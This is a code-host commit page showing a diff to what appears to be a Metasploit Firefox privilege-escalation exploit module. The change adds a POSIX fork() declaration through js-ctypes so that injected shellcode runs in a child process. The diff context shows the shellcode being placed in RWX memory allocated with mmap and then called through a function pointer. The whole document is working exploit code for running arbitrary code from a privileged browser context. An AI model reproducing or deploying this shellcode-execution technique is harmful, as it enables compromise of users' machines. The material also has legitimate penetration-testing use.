Add posix fork() call before running code.
parent
7afcb6aee8
commit
851fca2107
|
@ -52,6 +52,10 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
|
|||
ctypes.voidptr_t, /* src */
|
||||
ctypes.size_t /* size to copy */
|
||||
);
|
||||
var fork = lib.declare('fork',
|
||||
ctypes.default_abi, /* calling convention */
|
||||
ctypes.int /* return type */
|
||||
);
|
||||
var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
|
||||
var cstr = ctypes.jschar.array()(shellcode);
|
||||
//var bytes = ctypes.char.array()(shellcode).length-1;
|
||||
|
@ -59,7 +63,9 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
|
|||
/* there is probably a better way to do this */
|
||||
var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/);
|
||||
if (!m) throw new Error("Could not find address of buffer.");
|
||||
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
|
||||
if (fork() == 0) {
|
||||
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
|
||||
}
|
||||
};
|
||||
|
||||
var execWindows = function() {
|
||||
|
|
Loading…
Reference in New Issue